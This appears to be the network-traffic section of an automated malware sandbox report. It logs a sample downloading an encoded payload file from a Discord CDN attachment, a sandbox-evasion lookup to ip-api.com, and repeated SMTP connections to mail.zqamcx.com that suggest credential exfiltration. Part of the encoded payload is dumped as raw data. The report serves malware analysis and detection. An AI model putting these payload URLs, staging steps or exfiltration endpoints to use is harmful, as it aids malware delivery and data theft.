                              Sep 26, 2024 09:18:54.373331070 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.373338938 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.373377085 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.373445988 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.373552084 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.373599052 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.373650074 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.373655081 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.373681068 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.373704910 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.373752117 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.373806953 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.375844955 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.377594948 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.387025118 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:55.443361044 CEST4973280192.168.2.4208.95.112.1
                              Sep 26, 2024 09:18:55.448268890 CEST8049732208.95.112.1192.168.2.4
                              Sep 26, 2024 09:18:55.448342085 CEST4973280192.168.2.4208.95.112.1
                              Sep 26, 2024 09:18:55.448527098 CEST4973280192.168.2.4208.95.112.1
                              Sep 26, 2024 09:18:55.453630924 CEST8049732208.95.112.1192.168.2.4
                              Sep 26, 2024 09:18:56.173146963 CEST8049732208.95.112.1192.168.2.4
                              Sep 26, 2024 09:18:56.173299074 CEST8049732208.95.112.1192.168.2.4
                              Sep 26, 2024 09:18:56.173372030 CEST4973280192.168.2.4208.95.112.1
                              Sep 26, 2024 09:18:56.789660931 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:56.794625998 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:56.794737101 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:57.440876961 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:57.441437960 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:57.446379900 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:57.607733011 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:57.608017921 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:57.613971949 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.035113096 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.036175013 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.036251068 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:58.046757936 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:58.055841923 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.222718000 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.222759008 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.222795010 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.222831011 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:58.250165939 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:58.257999897 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.419301033 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.433442116 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:58.440336943 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.601455927 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.602745056 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:58.607675076 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.768929958 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.769290924 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:58.774132967 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.938026905 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.938465118 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:58.943454981 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.117639065 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.118005991 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:59.122925997 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.597043991 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.597101927 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.597266912 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:59.597414970 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:59.602271080 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.763427019 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.764264107 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:59.764347076 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:59.764390945 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:59.764410973 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:59.769165039 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.769227028 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.769368887 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.769403934 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:19:00.063638926 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:19:00.112437963 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:19:46.860256910 CEST8049732208.95.112.1192.168.2.4
                              Sep 26, 2024 09:19:46.860441923 CEST4973280192.168.2.4208.95.112.1
                              Sep 26, 2024 09:20:36.160512924 CEST4973280192.168.2.4208.95.112.1
                              Sep 26, 2024 09:20:36.165497065 CEST8049732208.95.112.1192.168.2.4
                              Sep 26, 2024 09:20:36.737802982 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:20:36.742779016 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:20:36.904401064 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:20:36.912650108 CEST49733587192.168.2.478.110.166.82

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Sep 26, 2024 09:18:53.048355103 CEST4942753192.168.2.41.1.1.1
                              Sep 26, 2024 09:18:53.055481911 CEST53494271.1.1.1192.168.2.4
                              Sep 26, 2024 09:18:55.431085110 CEST5996253192.168.2.41.1.1.1
                              Sep 26, 2024 09:18:55.437942982 CEST53599621.1.1.1192.168.2.4
                              Sep 26, 2024 09:18:56.721034050 CEST5817453192.168.2.41.1.1.1
                              Sep 26, 2024 09:18:56.788402081 CEST53581741.1.1.1192.168.2.4
                              Sep 26, 2024 09:19:33.249334097 CEST5350568162.159.36.2192.168.2.4
                              Sep 26, 2024 09:19:33.741158962 CEST5855653192.168.2.41.1.1.1
                              Sep 26, 2024 09:19:33.755312920 CEST53585561.1.1.1192.168.2.4

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Sep 26, 2024 09:18:53.048355103 CEST192.168.2.41.1.1.10xcf27Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                              Sep 26, 2024 09:18:55.431085110 CEST192.168.2.41.1.1.10xa1b2Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                              Sep 26, 2024 09:18:56.721034050 CEST192.168.2.41.1.1.10x9522Standard query (0)mail.zqamcx.comA (IP address)IN (0x0001)false
                              Sep 26, 2024 09:19:33.741158962 CEST192.168.2.41.1.1.10xd0bfStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Sep 26, 2024 09:18:53.055481911 CEST1.1.1.1192.168.2.40xcf27No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                              Sep 26, 2024 09:18:53.055481911 CEST1.1.1.1192.168.2.40xcf27No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                              Sep 26, 2024 09:18:53.055481911 CEST1.1.1.1192.168.2.40xcf27No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                              Sep 26, 2024 09:18:53.055481911 CEST1.1.1.1192.168.2.40xcf27No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                              Sep 26, 2024 09:18:53.055481911 CEST1.1.1.1192.168.2.40xcf27No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                              Sep 26, 2024 09:18:55.437942982 CEST1.1.1.1192.168.2.40xa1b2No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                              Sep 26, 2024 09:18:56.788402081 CEST1.1.1.1192.168.2.40x9522No error (0)mail.zqamcx.comzqamcx.comCNAME (Canonical name)IN (0x0001)false
                              Sep 26, 2024 09:18:56.788402081 CEST1.1.1.1192.168.2.40x9522No error (0)zqamcx.com78.110.166.82A (IP address)IN (0x0001)false
                              Sep 26, 2024 09:19:33.755312920 CEST1.1.1.1192.168.2.40xd0bfName error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • cdn.discordapp.com
                              • ip-api.com

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449732208.95.112.1804136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              TimestampBytes transferredDirectionData
                              Sep 26, 2024 09:18:55.448527098 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                              Host: ip-api.com
                              Connection: Keep-Alive
                              Sep 26, 2024 09:18:56.173146963 CEST175INHTTP/1.1 200 OK
                              Date: Thu, 26 Sep 2024 07:18:55 GMT
                              Content-Type: text/plain; charset=utf-8
                              Content-Length: 6
                              Access-Control-Allow-Origin: *
                              X-Ttl: 60
                              X-Rl: 44
                              Data Raw: 66 61 6c 73 65 0a
                              Data Ascii: false
                              Sep 26, 2024 09:18:56.173299074 CEST175INHTTP/1.1 200 OK
                              Date: Thu, 26 Sep 2024 07:18:55 GMT
                              Content-Type: text/plain; charset=utf-8
                              Content-Length: 6
                              Access-Control-Allow-Origin: *
                              X-Ttl: 60
                              X-Rl: 44
                              Data Raw: 66 61 6c 73 65 0a
                              Data Ascii: false


                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449731162.159.134.2334437068C:\Users\user\Desktop\450230549.exe
                              TimestampBytes transferredDirectionData
                              2024-09-26 07:18:53 UTC227OUTGET /attachments/1288648799220400244/1288752046828425256/kingggggme.txt?ex=66f6535f&is=66f501df&hm=79c31af27b70e67c8e5bccaa49762a5ee024314b22617ea8ae2de8893a0fe97d& HTTP/1.1
                              Host: cdn.discordapp.com
                              Connection: Keep-Alive
                              2024-09-26 07:18:53 UTC1167INHTTP/1.1 200 OK
                              Date: Thu, 26 Sep 2024 07:18:53 GMT
                              Content-Type: text/plain; charset=utf-8
                              Content-Length: 327008
                              Connection: close
                              CF-Ray: 8c917b89e9790cbe-EWR
                              CF-Cache-Status: HIT
                              Accept-Ranges: bytes, bytes
                              Age: 292
                              Cache-Control: public, max-age=31536000
                              Content-Disposition: attachment; filename="kingggggme.txt"
                              ETag: "1d67d8fd28fdc38b1606e7bd4c223a9d"
                              Expires: Fri, 26 Sep 2025 07:18:53 GMT
                              Last-Modified: Thu, 26 Sep 2024 06:40:31 GMT
                              Vary: Accept-Encoding
                              x-goog-generation: 1727332831882171
                              x-goog-hash: crc32c=F3gHFg==
                              x-goog-hash: md5=HWfY/Sj9w4sWBue9TCI6nQ==
                              x-goog-metageneration: 1
                              x-goog-storage-class: STANDARD
                              x-goog-stored-content-encoding: identity
                              x-goog-stored-content-length: 327008
                              x-guploader-uploadid: AD-8lju3uJoGBfUAjwTgY9LbeXLUt8urYA2Htf6w7r-KcxQncnAirdRbyxFxxRBN4SBcXOT49-k9E6it_w
                              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                              Set-Cookie: __cf_bm=Pum18emwImaEK5bNXVp_zo.NNpZ5vtLIxEQ5usxtLiE-1727335133-1.0.1.1-PezEQaCmvqKeBQo9FLqK.8k4JYbfqK4GeJl4xB.kjIzDJ4UUY.hvXapfTguv4H2a3.5suaB797hrwIwipPwT4A; path=/; expires=Thu, 26-Sep-24 07:48:53 GMT; domain=.discordapp.com; HttpOnly; Secure
                              2024-09-26 07:18:53 UTC521INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 31 6b 68 66 54 7a 48 6b 49 38 4f 79 41 77 34 32 43 68 4f 6e 25 32 46 62 70 38 4d 33 76 6b 53 25 32 42 6e 4c 4a 46 35 49 76 4d 74 79 4f 51 72 33 66 47 76 50 65 48 4c 73 37 55 76 62 43 6f 76 6b 41 74 66 25 32 42 4d 62 33 5a 42 54 25 32 46 4f 32 58 6a 51 42 50 57 7a 38 35 6c 70 50 63 47 66 66 52 78 45 69 6e 51 5a 6f 52 30 71 56 38 4f 78 77 25 32 42 37 67 48 69 71 68 4d 75 55 72 6c 44 6e 53 52 25 32 46 70 6c 32 74 46 44 52 38 62 55 55 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78
                              Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1khfTzHkI8OyAw42ChOn%2Fbp8M3vkS%2BnLJF5IvMtyOQr3fGvPeHLs7UvbCovkAtf%2BMb3ZBT%2FO2XjQBPWz85lpPcGffRxEinQZoR0qV8Oxw%2B7gHiqhMuUrlDnSR%2Fpl2tFDR8bUUw%3D%3D"}],"group":"cf-nel","max
                              2024-09-26 07:18:53 UTC1050INData Raw: 66 4b 32 4e 61 51 78 48 56 59 5a 56 54 41 6f 2b 4e 65 4c 79 57 4e 6b 4c 67 47 45 66 74 62 47 65 73 48 52 63 61 77 39 41 46 64 57 72 67 35 48 6f 65 42 48 4b 79 4f 42 62 63 55 54 2b 65 71 7a 64 38 6e 76 6a 31 56 58 54 6b 33 6c 74 39 50 41 51 5a 44 7a 4d 73 65 52 31 44 69 44 65 75 43 47 77 69 69 57 57 53 50 48 41 73 55 54 32 50 79 79 35 77 7a 72 5a 36 46 5a 76 4f 59 6a 67 54 7a 53 30 4b 34 74 32 33 55 67 64 49 62 6e 50 38 6a 73 50 48 49 6c 6a 6c 6b 74 45 72 4e 5a 72 65 79 7a 5a 53 57 74 2f 2b 30 37 31 54 58 58 6f 6a 35 38 43 75 62 32 69 32 30 6f 51 77 51 71 69 6c 75 7a 57 2b 76 30 76 36 79 78 44 79 78 6d 6a 67 6b 37 37 34 64 78 43 74 2f 38 6f 41 57 67 6b 55 73 4d 31 2f 79 77 65 53 62 2b 67 47 69 61 52 34 6a 2f 77 5a 4c 33 58 74 61 41 4f 61 61 70 65 34 50 54
                              Data Ascii: fK2NaQxHVYZVTAo+NeLyWNkLgGEftbGesHRcaw9AFdWrg5HoeBHKyOBbcUT+eqzd8nvj1VXTk3lt9PAQZDzMseR1DiDeuCGwiiWWSPHAsUT2Pyy5wzrZ6FZvOYjgTzS0K4t23UgdIbnP8jsPHIljlktErNZreyzZSWt/+071TXXoj58Cub2i20oQwQqiluzW+v0v6yxDyxmjgk774dxCt/8oAWgkUsM1/yweSb+gGiaR4j/wZL3XtaAOaape4PT
                              2024-09-26 07:18:53 UTC1369INData Raw: 47 68 67 59 51 70 52 4b 74 75 48 37 65 64 30 41 31 46 4c 72 66 46 44 4a 4d 47 67 76 6a 59 6e 45 37 57 5a 4c 58 47 71 2f 6e 45 53 47 73 6c 78 56 64 6b 6b 52 44 77 76 5a 39 55 73 6c 77 48 74 36 36 73 64 32 44 44 73 47 45 47 33 48 45 63 35 4a 64 2f 56 31 75 4f 76 52 50 67 59 57 47 79 68 76 2b 4e 74 6d 71 70 4c 42 47 69 75 66 35 66 68 71 49 2b 58 39 78 43 72 4c 51 51 42 4a 74 6c 73 6e 6e 6b 6d 37 37 41 6c 59 57 39 72 45 73 74 49 6c 49 63 41 46 34 4c 59 5a 66 4b 58 53 67 48 76 45 61 41 6b 70 30 79 4e 58 35 42 6e 62 75 4b 66 58 54 72 6b 4e 67 6e 38 5a 6e 50 73 6d 39 4f 68 49 63 48 64 44 54 6b 4b 6f 31 58 70 78 78 45 38 68 56 42 68 78 39 69 43 35 35 58 2b 39 37 71 70 35 79 41 52 4c 51 4f 31 31 5a 6f 35 73 4a 44 31 6a 4f 56 75 79 34 49 75 2b 39 2b 4d 66 73 6d 67
                              Data Ascii: GhgYQpRKtuH7ed0A1FLrfFDJMGgvjYnE7WZLXGq/nESGslxVdkkRDwvZ9UslwHt66sd2DDsGEG3HEc5Jd/V1uOvRPgYWGyhv+NtmqpLBGiuf5fhqI+X9xCrLQQBJtlsnnkm77AlYW9rEstIlIcAF4LYZfKXSgHvEaAkp0yNX5BnbuKfXTrkNgn8ZnPsm9OhIcHdDTkKo1XpxxE8hVBhx9iC55X+97qp5yARLQO11Zo5sJD1jOVuy4Iu+9+Mfsmg
                              2024-09-26 07:18:53 UTC581INData Raw: 64 39 79 57 4b 32 62 2f 32 42 44 74 43 47 68 64 6b 74 34 76 6e 59 43 2f 6c 49 61 51 67 77 53 58 6f 73 55 43 6c 78 79 67 48 30 6e 69 36 63 62 42 4a 34 42 33 64 61 7a 73 55 34 62 78 75 7a 6a 7a 6b 44 2f 75 66 48 6f 72 38 61 6f 42 42 4d 75 71 75 62 6b 71 30 56 4c 52 57 72 45 59 31 4e 56 67 52 6c 69 6e 34 79 6b 61 30 69 64 58 68 42 36 67 6a 6e 32 6e 53 62 48 6d 4a 46 45 4b 76 78 5a 63 66 35 76 43 58 66 56 47 6a 48 36 6c 2b 69 70 51 4c 33 6d 2f 4f 75 31 6e 43 6a 30 4f 55 54 75 49 65 63 63 74 39 52 31 59 6a 4c 55 36 54 79 68 5a 4a 6a 54 47 59 47 45 38 30 66 33 4d 7a 59 37 73 47 63 63 4a 6a 30 51 4e 76 67 38 36 2f 75 38 78 47 49 74 64 71 71 6c 42 72 56 71 2f 76 72 54 57 36 79 31 4b 66 52 67 46 6c 6b 51 58 4b 4d 66 59 35 32 71 69 4b 7a 69 71 2b 44 48 34 6f 73 74
                              Data Ascii: d9yWK2b/2BDtCGhdkt4vnYC/lIaQgwSXosUClxygH0ni6cbBJ4B3dazsU4bxuzjzkD/ufHor8aoBBMuqubkq0VLRWrEY1NVgRlin4yka0idXhB6gjn2nSbHmJFEKvxZcf5vCXfVGjH6l+ipQL3m/Ou1nCj0OUTuIecct9R1YjLU6TyhZJjTGYGE80f3MzY7sGccJj0QNvg86/u8xGItdqqlBrVq/vrTW6y1KfRgFlkQXKMfY52qiKziq+DH4ost
                              2024-09-26 07:18:53 UTC1369INData Raw: 46 75 5a 33 44 57 67 73 56 4d 7a 77 45 42 6e 78 6e 6a 54 4c 75 41 36 43 61 38 30 46 44 4b 54 30 79 49 53 4f 39 62 76 73 72 77 77 41 66 72 42 75 6a 57 58 73 4f 37 65 43 6c 46 48 4f 76 4f 47 74 6d 44 42 43 6c 63 61 49 74 68 54 78 62 41 56 51 61 6f 35 45 36 4b 53 63 53 4e 71 30 51 6f 65 52 52 2b 4a 64 6c 54 69 70 42 42 5a 67 30 47 71 71 41 5a 39 77 32 35 56 30 4c 68 71 4e 55 76 4f 68 74 45 79 56 75 36 6c 6e 52 34 51 46 65 62 53 45 48 59 71 67 66 63 52 37 73 49 2b 58 49 58 54 75 58 7a 64 76 41 72 59 58 6f 58 36 79 72 43 4f 6d 6c 56 41 79 6a 2b 51 42 78 71 30 59 4f 46 45 53 43 38 34 56 78 52 34 4a 59 45 4d 4d 52 57 51 45 2f 74 39 53 7a 31 69 67 30 44 2f 4d 32 58 6e 30 41 70 4f 4c 43 5a 62 42 61 62 77 7a 5a 4f 79 53 31 2f 48 76 58 77 68 74 45 65 66 41 62 6b 49
                              Data Ascii: FuZ3DWgsVMzwEBnxnjTLuA6Ca80FDKT0yISO9bvsrwwAfrBujWXsO7eClFHOvOGtmDBClcaIthTxbAVQao5E6KScSNq0QoeRR+JdlTipBBZg0GqqAZ9w25V0LhqNUvOhtEyVu6lnR4QFebSEHYqgfcR7sI+XIXTuXzdvArYXoX6yrCOmlVAyj+QBxq0YOFESC84VxR4JYEMMRWQE/t9Sz1ig0D/M2Xn0ApOLCZbBabwzZOyS1/HvXwhtEefAbkI
                              2024-09-26 07:18:53 UTC1369INData Raw: 43 45 57 38 70 4d 2b 6a 56 4b 43 47 72 4f 49 52 7a 44 76 2b 6a 6a 64 53 32 46 41 74 41 6d 51 38 68 7a 42 4f 55 58 65 78 30 48 31 68 34 30 46 64 4f 67 59 75 41 35 4f 61 71 47 6b 78 68 6c 51 48 6a 32 49 6a 74 6d 4c 50 41 55 58 58 51 45 39 78 48 61 2f 53 2b 58 6a 61 76 53 2f 4d 4b 62 49 70 59 53 79 69 4f 71 51 7a 6b 52 43 75 62 4b 4f 77 78 39 37 2f 4b 54 72 6a 61 30 72 66 53 4a 54 67 65 54 6e 64 62 79 30 64 67 54 4d 4e 4b 71 69 6b 45 7a 35 72 77 34 36 6c 64 2f 66 45 73 41 72 4f 6a 6d 53 45 44 46 61 72 32 69 6d 33 56 6b 44 41 61 57 30 41 68 45 38 77 72 37 53 47 4d 6f 44 50 6f 78 68 57 44 66 79 74 6f 57 42 41 37 5a 34 30 7a 4d 53 4b 41 34 4c 6a 54 4a 48 32 76 50 69 50 68 6a 48 67 33 37 5a 4a 52 4a 45 32 6a 31 56 30 6b 4d 52 55 34 2f 54 79 75 4d 31 4e 6c 45 72
                              Data Ascii: CEW8pM+jVKCGrOIRzDv+jjdS2FAtAmQ8hzBOUXex0H1h40FdOgYuA5OaqGkxhlQHj2IjtmLPAUXXQE9xHa/S+XjavS/MKbIpYSyiOqQzkRCubKOwx97/KTrja0rfSJTgeTndby0dgTMNKqikEz5rw46ld/fEsArOjmSEDFar2im3VkDAaW0AhE8wr7SGMoDPoxhWDfytoWBA7Z40zMSKA4LjTJH2vPiPhjHg37ZJRJE2j1V0kMRU4/TyuM1NlEr
                              2024-09-26 07:18:53 UTC1369INData Raw: 34 4a 36 57 72 63 74 69 67 62 38 59 67 65 48 53 32 6b 72 69 75 71 6f 41 72 46 43 74 41 2f 5a 4b 4e 46 76 73 78 67 68 54 68 58 6a 45 32 47 57 78 6b 4b 45 49 33 63 72 52 38 44 6b 52 33 67 6f 78 46 4a 4f 42 71 6b 71 74 74 64 58 5a 62 2f 56 6d 64 70 6a 50 6d 56 6c 65 2b 72 4b 5a 45 61 35 47 4b 70 4d 49 36 4c 38 6e 46 77 34 75 4d 55 4b 6b 4e 70 6e 4e 66 6e 53 73 75 32 70 2f 69 67 39 57 64 32 32 39 69 6b 33 2b 63 46 77 36 45 4f 70 51 58 75 57 41 66 6e 48 4e 2f 4a 72 57 66 50 31 55 6f 53 74 75 44 59 53 54 4e 7a 2b 69 70 43 51 4d 4e 38 43 77 4e 59 57 6d 70 62 7a 4f 71 64 58 69 4a 38 74 2f 78 30 49 6b 42 78 5a 47 72 48 4c 37 51 65 33 33 4e 4b 58 78 65 79 55 31 44 34 62 50 32 47 46 59 31 6e 4e 6a 36 6a 6a 79 46 63 39 46 55 42 46 77 62 6e 2b 32 43 46 62 32 44 45 68
                              Data Ascii: 4J6Wrctigb8YgeHS2kriuqoArFCtA/ZKNFvsxghThXjE2GWxkKEI3crR8DkR3goxFJOBqkqttdXZb/VmdpjPmVle+rKZEa5GKpMI6L8nFw4uMUKkNpnNfnSsu2p/ig9Wd229ik3+cFw6EOpQXuWAfnHN/JrWfP1UoStuDYSTNz+ipCQMN8CwNYWmpbzOqdXiJ8t/x0IkBxZGrHL7Qe33NKXxeyU1D4bP2GFY1nNj6jjyFc9FUBFwbn+2CFb2DEh
                              2024-09-26 07:18:53 UTC1369INData Raw: 79 2b 42 50 54 4f 38 4d 36 43 39 59 53 64 5a 47 45 78 6c 69 6b 57 53 41 54 46 67 32 71 70 35 64 6c 36 37 59 2f 5a 61 77 4f 32 73 7a 6a 32 54 4b 74 57 36 73 4d 49 53 36 78 51 59 39 44 57 62 4a 79 73 2b 71 37 57 70 4a 78 4f 50 70 31 50 43 42 59 6a 76 45 6e 50 73 77 5a 74 31 44 53 66 30 65 74 34 38 59 4c 4b 61 52 59 50 44 67 34 56 55 43 54 32 4f 77 38 6d 75 69 6e 7a 37 49 67 7a 4f 38 49 62 58 67 32 37 31 48 62 59 2f 71 72 57 65 70 6d 36 46 44 4e 77 4c 4c 54 41 30 4e 62 65 69 42 56 73 68 53 46 51 2b 67 6c 77 33 55 37 68 6d 4f 74 34 69 5a 2f 4a 5a 62 5a 6e 5a 6f 2b 4a 72 72 54 79 39 43 42 5a 37 6e 74 73 2b 57 74 6e 4a 71 72 61 6c 31 76 2b 77 53 31 50 5a 68 51 31 51 32 36 53 78 77 64 75 59 4f 6a 7a 4a 33 6c 4d 77 4f 73 78 68 6b 30 45 73 63 4a 49 79 4a 52 37 6a
                              Data Ascii: y+BPTO8M6C9YSdZGExlikWSATFg2qp5dl67Y/ZawO2szj2TKtW6sMIS6xQY9DWbJys+q7WpJxOPp1PCBYjvEnPswZt1DSf0et48YLKaRYPDg4VUCT2Ow8muinz7IgzO8IbXg271HbY/qrWepm6FDNwLLTA0NbeiBVshSFQ+glw3U7hmOt4iZ/JZbZnZo+JrrTy9CBZ7nts+WtnJqral1v+wS1PZhQ1Q26SxwduYOjzJ3lMwOsxhk0EscJIyJR7j
                              2024-09-26 07:18:53 UTC1369INData Raw: 51 6a 32 43 75 35 4e 53 73 53 56 44 4f 79 6f 42 78 6b 76 33 59 66 4d 34 67 44 68 79 4f 72 31 5a 75 53 61 71 54 33 38 77 58 70 35 48 39 71 54 33 54 78 6d 35 32 2f 70 47 7a 32 57 51 69 37 2b 68 50 77 4d 4d 42 4f 45 59 35 4c 41 4b 45 47 68 76 51 66 6d 6d 45 64 79 73 7a 2f 34 61 48 6b 69 48 7a 54 69 43 69 4b 55 53 45 2f 4b 7a 2b 71 70 32 4e 52 37 73 77 49 45 4f 52 49 4c 43 49 4e 43 39 79 49 70 36 47 5a 6a 7a 42 42 73 46 6b 77 78 4c 56 72 36 6b 48 64 70 34 70 57 63 4e 39 37 77 75 48 4d 4a 39 6b 68 6f 43 59 6d 54 51 67 2b 50 4a 55 71 44 35 36 47 36 57 4f 32 69 42 49 41 65 52 58 65 6f 63 50 66 43 4a 6d 38 76 4d 65 65 48 69 56 66 75 38 48 39 75 42 33 4d 6e 57 7a 7a 55 55 73 65 67 45 63 77 69 4f 4b 71 55 45 62 42 73 58 78 57 75 53 7a 4e 77 49 61 77 4c 43 32 57 44
                              Data Ascii: Qj2Cu5NSsSVDOyoBxkv3YfM4gDhyOr1ZuSaqT38wXp5H9qT3Txm52/pGz2WQi7+hPwMMBOEY5LAKEGhvQfmmEdysz/4aHkiHzTiCiKUSE/Kz+qp2NR7swIEORILCINC9yIp6GZjzBBsFkwxLVr6kHdp4pWcN97wuHMJ9khoCYmTQg+PJUqD56G6WO2iBIAeRXeocPfCJm8vMeeHiVfu8H9uB3MnWzzUUsegEcwiOKqUEbBsXxWuSzNwIawLC2WD
                              2024-09-26 07:18:53 UTC1369INData Raw: 6f 42 52 59 2b 6e 4a 70 49 72 51 7a 4f 37 49 41 39 5a 34 79 49 5a 70 47 4e 6f 49 4e 50 36 65 6d 4a 4b 4c 67 74 42 50 59 34 4d 53 46 4b 30 45 69 39 32 5a 59 48 67 4b 76 66 2b 65 77 2f 6d 77 41 55 51 2b 31 79 58 49 53 57 6f 5a 67 6c 43 63 6b 6f 72 74 78 54 73 62 70 42 6c 33 64 4f 68 69 70 68 62 79 33 47 46 6d 79 4a 67 79 4a 54 6f 6f 6b 66 2b 63 6f 46 41 49 57 62 4e 48 5a 55 66 71 4c 31 46 6e 74 6b 76 37 52 4c 78 6b 55 49 50 6d 54 49 57 6c 2f 78 57 30 33 6f 37 62 6f 6e 53 50 71 59 54 36 30 31 5a 2f 54 75 6a 72 4c 33 35 66 73 57 47 38 35 4e 58 72 59 31 59 48 41 33 68 57 65 64 4a 59 43 55 7a 63 67 56 76 67 76 2b 50 59 4b 4d 7a 59 62 41 6f 54 4c 6b 46 6e 32 34 62 59 75 50 46 79 4a 54 6f 77 51 63 51 59 36 45 58 38 35 64 51 75 54 54 33 57 77 72 6f 42 32 74 7a 63
